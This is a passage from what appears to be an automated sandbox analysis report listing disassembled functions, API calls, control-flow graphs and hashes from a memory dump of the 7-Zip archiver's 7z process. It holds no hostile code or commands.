                                                                                                                                                                                                • free.MSVCRT ref: 0096AF7F
                                                                                                                                                                                                  • Part of subcall function 009694A8: free.MSVCRT ref: 009694DB
                                                                                                                                                                                                  • Part of subcall function 009694A8: free.MSVCRT ref: 009694E3
                                                                                                                                                                                                  • Part of subcall function 009694A8: free.MSVCRT ref: 009694F0
                                                                                                                                                                                                  • Part of subcall function 009694A8: free.MSVCRT ref: 0096951C
                                                                                                                                                                                                  • Part of subcall function 009694A8: free.MSVCRT ref: 00969525
                                                                                                                                                                                                  • Part of subcall function 009694A8: free.MSVCRT ref: 0096952D
                                                                                                                                                                                                  • Part of subcall function 009694A8: free.MSVCRT ref: 0096953A
                                                                                                                                                                                                • free.MSVCRT ref: 0096AEC2
                                                                                                                                                                                                  • Part of subcall function 0094339C: free.MSVCRT ref: 009433D7
                                                                                                                                                                                                  • Part of subcall function 0094339C: memmove.MSVCRT(00000000,?,?,00000000,009410A8), ref: 009433F2
                                                                                                                                                                                                  • Part of subcall function 0096A9FC: free.MSVCRT ref: 0096AA95
                                                                                                                                                                                                  • Part of subcall function 0096A9FC: free.MSVCRT ref: 0096AAC5
                                                                                                                                                                                                  • Part of subcall function 0096A9FC: free.MSVCRT ref: 0096AAD2
                                                                                                                                                                                                • free.MSVCRT ref: 0096AEFA
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 0096AF4D
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmove$AddressProc
                                                                                                                                                                                                • String ID: 7z.dll$Codecs\$Formats\$SetCodecs
                                                                                                                                                                                                • API String ID: 4053071709-2499791885
                                                                                                                                                                                                • Opcode ID: 8408131b45c12e29ab25c2e406772a01b5634e2fefe50597f9c143b7cfa8c1f7
                                                                                                                                                                                                • Instruction ID: 9055ec11e32c7b18bad45c0420bce6a2aef2743ad3dc3b081e6b58b9a68ac371
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8408131b45c12e29ab25c2e406772a01b5634e2fefe50597f9c143b7cfa8c1f7
                                                                                                                                                                                                • Instruction Fuzzy Hash: 14B1C376209AC096CB20EB21E59036FB7A4F3C5788F504116EB8E57B65DF7CC999CB02
                                                                                                                                                                                                Function 00981850 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 122COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 3343 981850-981886 EnterCriticalSection 3344 981888-98188e call 98b1c8 3343->3344 3345 9818b1-9818bb 3343->3345 3349 981893-9818ac 3344->3349 3347 9818bd call 9422e4 3345->3347 3348 9818c2-9818c4 3345->3348 3347->3348 3351 9818ca-9818d2 3348->3351 3352 981991-98199e 3348->3352 3349->3345 3355 98191a-98192b 3351->3355 3356 9818d4-9818da 3351->3356 3353 981a4e-981a57 LeaveCriticalSection 3352->3353 3354 9819a4-9819a7 3352->3354 3357 981a59-981a62 3353->3357 3354->3353 3358 9819ad-9819b7 3354->3358 3359 98196a-981974 3355->3359 3360 98192d-98193a call 942300 3355->3360 3356->3355 3361 9818dc-9818e2 3356->3361 3362 9819b9-9819d7 call 942300 fputs 3358->3362 3363 981a31-981a4c LeaveCriticalSection 3358->3363 3359->3363 3365 98197a-981981 3359->3365 3360->3359 3374 98193c-981965 fputs call 9426a0 call 942300 3360->3374 3366 9818ed 3361->3366 3367 9818e4-9818eb 3361->3367 3377 9819d9-9819f0 fputs 3362->3377 3378 9819f2-981a14 call 946618 call 942320 free 3362->3378 3363->3357 3365->3363 3370 981987-98198c call 9422e4 3365->3370 3371 9818f4-9818fe 3366->3371 3367->3371 3370->3363 3371->3359 3372 981900-981913 fputs call 942300 3371->3372 3381 981918 3372->3381 3374->3359 3382 981a19-981a2c call 942300 call 9422e4 3377->3382 3378->3382 3381->3359 3382->3363
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • EnterCriticalSection.KERNEL32 ref: 00981877
                                                                                                                                                                                                • fputs.MSVCRT ref: 0098190A
                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32 ref: 00981A44
                                                                                                                                                                                                  • Part of subcall function 0098B1C8: memset.MSVCRT ref: 0098B20D
                                                                                                                                                                                                  • Part of subcall function 0098B1C8: fputs.MSVCRT ref: 0098B232
                                                                                                                                                                                                • fputs.MSVCRT ref: 0098194D
                                                                                                                                                                                                  • Part of subcall function 009426A0: fputs.MSVCRT ref: 009426C1
                                                                                                                                                                                                • fputs.MSVCRT ref: 009819CB
                                                                                                                                                                                                • fputs.MSVCRT ref: 009819EA
                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32 ref: 00981A51
                                                                                                                                                                                                  • Part of subcall function 00942300: fputc.MSVCRT ref: 00942311
                                                                                                                                                                                                • free.MSVCRT ref: 00981A14
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs$CriticalSection$Leave$Enterfputcfreememset
                                                                                                                                                                                                • String ID: Can't allocate required memory!$ERROR: $Everything is Ok$Sub items Errors: $p
                                                                                                                                                                                                • API String ID: 676172275-580504279
                                                                                                                                                                                                • Opcode ID: bc88cfa74a48e71b2a3b1c96f7bb5f7f406cfe66436ff89ac4e6136bfa2ff71f
                                                                                                                                                                                                • Instruction ID: 7990e7239c8e74675cbba969d9774e3ae963fd787337095486808e43ab4a3a3e
                                                                                                                                                                                                • Opcode Fuzzy Hash: bc88cfa74a48e71b2a3b1c96f7bb5f7f406cfe66436ff89ac4e6136bfa2ff71f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D519072305A81A2DB1DEF25E9A07AD6338FB85B94F445226DB6E07751CF3CD8A6C300
                                                                                                                                                                                                Function 009638E8 Relevance: 22.8, APIs: 13, Strings: 2, Instructions: 262COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 3392 9638e8-963977 call 961700 call 96373c memmove 3397 963992-9639a5 3392->3397 3398 963979-96398d call 963864 free 3392->3398 3400 963a30-963a3d call 963864 3397->3400 3401 9639ab 3397->3401 3405 963cb6-963cc9 3398->3405 3409 963a65-963a77 3400->3409 3410 963a3f-963a64 call 9602a0 _CxxThrowException 3400->3410 3404 9639ae-9639c2 3401->3404 3407 9639c4-9639ec call 9609e0 call 942130 3404->3407 3408 963a1d-963a25 3404->3408 3424 9639ee-9639f9 call 943314 3407->3424 3425 9639fb 3407->3425 3408->3404 3412 963a27-963a2b 3408->3412 3415 963ae1-963b27 call 975f5c call 9613e8 * 2 3409->3415 3416 963a79-963a7c 3409->3416 3410->3409 3412->3400 3439 963b2d-963b30 3415->3439 3440 963c2a-963c46 free 3415->3440 3420 963a7e-963aac call 943208 call 946e10 call 942130 3416->3420 3445 963aae-963abb call 943314 3420->3445 3446 963abd 3420->3446 3430 9639fe-963a16 call 94b8f0 free 3424->3430 3425->3430 3430->3408 3444 963b33-963b56 call 942130 3439->3444 3442 963c76-963c84 free 3440->3442 3443 963c48 3440->3443 3449 963c88-963c95 3442->3449 3448 963c4c-963c5f 3443->3448 3461 963b68 3444->3461 3462 963b58-963b66 call 943314 3444->3462 3447 963ac0-963adf call 94b8f0 free 3445->3447 3446->3447 3447->3415 3447->3420 3453 963c71-963c74 3448->3453 3454 963c61-963c6c free * 2 3448->3454 3455 963ca7-963caa 3449->3455 3456 963c97-963ca2 free * 2 3449->3456 3453->3442 3453->3448 3454->3453 3455->3449 3460 963cac-963cb4 free 3455->3460 3456->3455 3460->3405 3463 963b6b-963ba1 call 942130 3461->3463 3462->3463 3468 963bb3 3463->3468 3469 963ba3-963bb1 call 943314 3463->3469 3471 963bb6-963bc6 3468->3471 3469->3471 3473 963be4-963bf2 3471->3473 3474 963bc8-963be2 call 944338 3471->3474 3473->3444 3476 963bf8 3473->3476 3474->3473 3478 963bfa-963c29 call 9602a0 _CxxThrowException 3474->3478 3476->3440 3478->3440
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0096373C: free.MSVCRT ref: 009637FB
                                                                                                                                                                                                • memmove.MSVCRT ref: 0096396F
                                                                                                                                                                                                • free.MSVCRT ref: 00963986
                                                                                                                                                                                                • free.MSVCRT ref: 00963A11
                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 00963A5F
                                                                                                                                                                                                • free.MSVCRT ref: 00963AD3
                                                                                                                                                                                                  • Part of subcall function 00963864: free.MSVCRT ref: 00963877
                                                                                                                                                                                                  • Part of subcall function 00963864: free.MSVCRT ref: 00963892
                                                                                                                                                                                                  • Part of subcall function 00963864: free.MSVCRT ref: 0096389B
                                                                                                                                                                                                  • Part of subcall function 00963864: free.MSVCRT ref: 009638C6
                                                                                                                                                                                                  • Part of subcall function 00963864: free.MSVCRT ref: 009638CE
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$ExceptionThrowmemmove
                                                                                                                                                                                                • String ID: Cannot find archive$Duplicate archive path:
                                                                                                                                                                                                • API String ID: 3934437811-2067063536
                                                                                                                                                                                                • Opcode ID: cb8f74f9773297cdd49a0ca175e0294e4bed06a47462a3eb8b06c6dd458c7679
                                                                                                                                                                                                • Instruction ID: 52d572f0bf6e3183e7784cccc6161e76d14e4bce519861f72207bd65b43c2cfb
                                                                                                                                                                                                • Opcode Fuzzy Hash: cb8f74f9773297cdd49a0ca175e0294e4bed06a47462a3eb8b06c6dd458c7679
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9FA16472715A8492CA20EF26E89065EB3A5F7C5B90F549512EF8E07B69DF3CC945CB00
                                                                                                                                                                                                Function 009742A2 Relevance: 21.3, APIs: 13, Strings: 1, Instructions: 316COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 3481 9742a2-9742c0 3483 9742d5-9742d8 3481->3483 3484 9742c2-9742d0 3481->3484 3485 9742e0-9743ab call 9640c4 memmove call 943404 call 973a20 3483->3485 3486 9742da 3483->3486 3484->3483 3494 9743b1-9743b3 3485->3494 3495 9745d8-97468f call 943404 * 3 free * 2 call 96419c 3485->3495 3486->3485 3497 9746c5-9746f4 free * 2 call 96419c 3494->3497 3498 9743b9-9743d7 call 96c684 3494->3498 3533 974691-974697 3495->3533 3534 974698-9746a0 3495->3534 3508 9746f6-9746fc 3497->3508 3509 9746fd-974705 3497->3509 3505 9743dd-9743ef call 942130 3498->3505 3506 974728-974757 free * 2 call 96419c 3498->3506 3521 974403 3505->3521 3522 9743f1-974401 call 96caac 3505->3522 3525 974760-974768 3506->3525 3526 974759-97475f 3506->3526 3508->3509 3511 974707-97470d 3509->3511 3512 97470e-974719 3509->3512 3511->3512 3517 974721-974723 3512->3517 3518 97471b 3512->3518 3524 9747fe-974811 3517->3524 3518->3517 3532 974406-974441 call 94b8f0 free * 2 call 96419c 3521->3532 3522->3532 3529 974771-97477c 3525->3529 3530 97476a-974770 3525->3530 3526->3525 3535 974784-974786 3529->3535 3536 97477e 3529->3536 3530->3529 3551 974443-974449 3532->3551 3552 97444a-974452 3532->3552 3533->3534 3541 9746a2-9746a8 3534->3541 3542 9746a9-9746b4 3534->3542 3535->3524 3543 9747f2-9747fb 3535->3543 3536->3535 3541->3542 3542->3543 3546 9746ba-9746c0 3542->3546 3543->3524 3546->3543 3551->3552 3553 974454-97445a 3552->3553 3554 97445b-97446c 3552->3554 3553->3554 3555 974472-974478 3554->3555 3556 973fa9-974033 memmove 3554->3556 3555->3556 3561 974035-974052 memmove 3556->3561 3562 974054-974072 memmove 3556->3562 3563 974078-9740e9 memmove call 96c0fc call 943404 * 2 call 973d58 3561->3563 3562->3543 3562->3563 3573 9740ee-9740f2 3563->3573 3574 97447d-974480 3573->3574 3575 9740f8-97410a call 942130 3573->3575 3576 974486-97450b call 943404 * 3 3574->3576 3577 97450c-97451b call 96419c 3574->3577 3582 97411e 3575->3582 3583 97410c-97411c call 96caac 3575->3583 3576->3577 3577->3524 3587 974121-97413a call 94b8f0 call 96419c 3582->3587 3583->3587
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1534225298-3916222277
                                                                                                                                                                                                • Opcode ID: bfda89d0d9cdfe3f540f1be295f01f6c1ea07059f837bb15d646c794703c55e5
                                                                                                                                                                                                • Instruction ID: 2d233cff9e22d15ce9736b389b930813c3cfa33cc31285f71ccb697dbfd361e9
                                                                                                                                                                                                • Opcode Fuzzy Hash: bfda89d0d9cdfe3f540f1be295f01f6c1ea07059f837bb15d646c794703c55e5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8ED14F33209AC496CB25DF65E0906AEBB60F7D6B44F548016EB8E43B6ADF7CC549CB00
                                                                                                                                                                                                Function 009691E0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 103libraryloaderCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressProc$memmove
                                                                                                                                                                                                • String ID: CreateDecoder$CreateEncoder$GetHashers$GetMethodProperty$GetNumberOfMethods
                                                                                                                                                                                                • API String ID: 2879976980-73314117
                                                                                                                                                                                                • Opcode ID: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
                                                                                                                                                                                                • Instruction ID: 5a7713080e415b353dbb5337301dde0e988a9da612dd78211d83f5bf29a721a3
                                                                                                                                                                                                • Opcode Fuzzy Hash: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E418A32205A4196DF20DF25F89075EB3A9F784784F405126EB8E87B68EF78D949CB00
                                                                                                                                                                                                Function 00981BC0 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 250COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • fputs.MSVCRT ref: 00981CF9
                                                                                                                                                                                                  • Part of subcall function 0098B1C8: memset.MSVCRT ref: 0098B20D
                                                                                                                                                                                                  • Part of subcall function 0098B1C8: fputs.MSVCRT ref: 0098B232
                                                                                                                                                                                                  • Part of subcall function 00942300: fputc.MSVCRT ref: 00942311
                                                                                                                                                                                                • fputs.MSVCRT ref: 00981DEE
                                                                                                                                                                                                • fputs.MSVCRT ref: 00981F07
                                                                                                                                                                                                • fputs.MSVCRT ref: 00981F5C
                                                                                                                                                                                                  • Part of subcall function 0098171C: fputs.MSVCRT ref: 00981744
                                                                                                                                                                                                  • Part of subcall function 0098171C: fputs.MSVCRT ref: 00981758
                                                                                                                                                                                                  • Part of subcall function 0098171C: free.MSVCRT ref: 0098176B
                                                                                                                                                                                                  • Part of subcall function 00946618: FormatMessageW.KERNEL32 ref: 00946676
                                                                                                                                                                                                  • Part of subcall function 00946618: LocalFree.KERNEL32 ref: 00946698
                                                                                                                                                                                                  • Part of subcall function 00942320: free.MSVCRT ref: 0094237E
                                                                                                                                                                                                  • Part of subcall function 00942320: fputs.MSVCRT ref: 009423B8
                                                                                                                                                                                                  • Part of subcall function 00942320: free.MSVCRT ref: 009423C4
                                                                                                                                                                                                • free.MSVCRT ref: 00981F86
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs$free$FormatFreeLocalMessagefputcmemset
                                                                                                                                                                                                • String ID: Can't allocate required memory$ERROR: $ERRORS:$WARNINGS:
                                                                                                                                                                                                • API String ID: 2553544393-24972044
                                                                                                                                                                                                • Opcode ID: c8fab687c64268b82cb3662449b661246a7da8ff8f53bbd6509775a5cb297495
                                                                                                                                                                                                • Instruction ID: 735e969e5aa830899be735fb3c0ac9a4d7416ddbbd155079a92426039c3f4dac
                                                                                                                                                                                                • Opcode Fuzzy Hash: c8fab687c64268b82cb3662449b661246a7da8ff8f53bbd6509775a5cb297495
                                                                                                                                                                                                • Instruction Fuzzy Hash: 52A19177304AC59ACA29FF31D5907AE7328F785B84F484126EB5E47711DF68D8A6C300
                                                                                                                                                                                                Function 0098949B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 94COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$ExceptionThrowfputs
                                                                                                                                                                                                • String ID: Decoding ERROR
                                                                                                                                                                                                • API String ID: 117389134-2585761706
                                                                                                                                                                                                • Opcode ID: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
                                                                                                                                                                                                • Instruction ID: 464c2c6c050365758f8f6ec9fb4ea5ac15c2d0b0ede1676d484c82de637ecd6d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3431E4623199C081DA30FF25E8807ADA3A1FBC6790F485523EA9E57769EF38C8C5C701
                                                                                                                                                                                                Function 0096A7FC Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 123libraryloaderCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00946464: FreeLibrary.KERNELBASE(?,?,?,009464E7), ref: 00946475
                                                                                                                                                                                                  • Part of subcall function 00943404: free.MSVCRT ref: 00943431
                                                                                                                                                                                                  • Part of subcall function 00943404: memmove.MSVCRT ref: 0094344C
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 0096A8CA
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 0096A8E8
                                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 0096A908
                                                                                                                                                                                                • free.MSVCRT ref: 0096A985
                                                                                                                                                                                                • free.MSVCRT ref: 0096A996
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressProcfree$FreeLibrarymemmove
                                                                                                                                                                                                • String ID: CreateObject$SetCaseSensitive$SetLargePageMode
                                                                                                                                                                                                • API String ID: 852969883-606380122
                                                                                                                                                                                                • Opcode ID: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
                                                                                                                                                                                                • Instruction ID: e0b94e3df30562049ab0283f65299c3ee9b876fe6df6972865a9d1e5f9d133eb
                                                                                                                                                                                                • Opcode Fuzzy Hash: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3141B236200B8097DF20EF26E85075E7364FB85B98F488524DF9A47766EF38D986C741
                                                                                                                                                                                                Function 0098B480 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 229stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • strcmp.MSVCRT ref: 0098B723
                                                                                                                                                                                                • fputs.MSVCRT ref: 0098B743
                                                                                                                                                                                                  • Part of subcall function 009438C8: memmove.MSVCRT(0094A0E5), ref: 00943907
                                                                                                                                                                                                  • Part of subcall function 00943A64: memmove.MSVCRT ref: 00943AAA
                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0098B49E
                                                                                                                                                                                                  • Part of subcall function 00943404: free.MSVCRT ref: 00943431
                                                                                                                                                                                                  • Part of subcall function 00943404: memmove.MSVCRT ref: 0094344C
                                                                                                                                                                                                • strcmp.MSVCRT ref: 0098B4E3
                                                                                                                                                                                                • wcscmp.MSVCRT ref: 0098B502
                                                                                                                                                                                                • strcmp.MSVCRT ref: 0098B568
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memmovestrcmp$CountTickfputsfreewcscmp
                                                                                                                                                                                                • String ID: .
                                                                                                                                                                                                • API String ID: 591578422-4150638102
                                                                                                                                                                                                • Opcode ID: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
                                                                                                                                                                                                • Instruction ID: 3182c608ee52cf5e76bceea6c155b3f74e2227b3346e2504be87434a73145a48
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
                                                                                                                                                                                                • Instruction Fuzzy Hash: FBA14977700A85EBCB29EF2AD69065D7361F794B84F848026EB5A47B11DF34E8B6C700
                                                                                                                                                                                                Function 00969D98 Relevance: 12.1, APIs: 8, Instructions: 134COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00969BCC: free.MSVCRT ref: 00969C11
                                                                                                                                                                                                  • Part of subcall function 00969BCC: free.MSVCRT ref: 00969C19
                                                                                                                                                                                                  • Part of subcall function 00969BCC: free.MSVCRT ref: 00969C3B
                                                                                                                                                                                                  • Part of subcall function 00969BCC: free.MSVCRT ref: 00969D2A
                                                                                                                                                                                                • wcscmp.MSVCRT ref: 00969E66
                                                                                                                                                                                                • free.MSVCRT ref: 00969ECA
                                                                                                                                                                                                • free.MSVCRT ref: 00969ED4
                                                                                                                                                                                                • free.MSVCRT ref: 00969F13
                                                                                                                                                                                                • free.MSVCRT ref: 00969F1B
                                                                                                                                                                                                • free.MSVCRT ref: 00969F28
                                                                                                                                                                                                • free.MSVCRT ref: 00969F49
                                                                                                                                                                                                • free.MSVCRT ref: 00969F51
                                                                                                                                                                                                  • Part of subcall function 00943404: free.MSVCRT ref: 00943431
                                                                                                                                                                                                  • Part of subcall function 00943404: memmove.MSVCRT ref: 0094344C
                                                                                                                                                                                                Memory Dump Source
